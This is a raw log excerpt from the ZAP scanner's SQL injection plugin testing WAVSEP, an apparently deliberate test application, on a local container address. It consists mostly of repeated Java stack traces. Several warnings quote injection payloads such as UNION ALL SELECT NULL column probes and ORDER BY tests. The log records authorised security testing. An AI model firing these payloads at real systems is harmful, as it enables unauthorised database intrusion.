org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680996 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680997 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680999 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681000 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681001 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681002 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681003 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 7404#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 7404# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681004 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681004 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681005 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 6470#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 6470# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681006 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681007 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 